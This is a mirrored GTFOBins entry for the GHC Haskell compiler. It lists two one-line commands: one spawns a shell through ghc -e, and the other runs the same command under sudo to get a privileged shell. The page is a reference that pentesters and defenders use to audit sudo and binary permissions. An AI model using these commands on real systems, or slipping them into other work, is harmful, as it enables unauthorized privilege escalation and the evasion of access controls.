1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ghc.md
2020-10-24 12:46:42 +02:00

8 lines
157 B
Markdown

---
functions:
shell:
- code: ghc -e 'System.Process.callCommand "/bin/sh"'
sudo:
- code: sudo ghc -e 'System.Process.callCommand "/bin/sh"'
---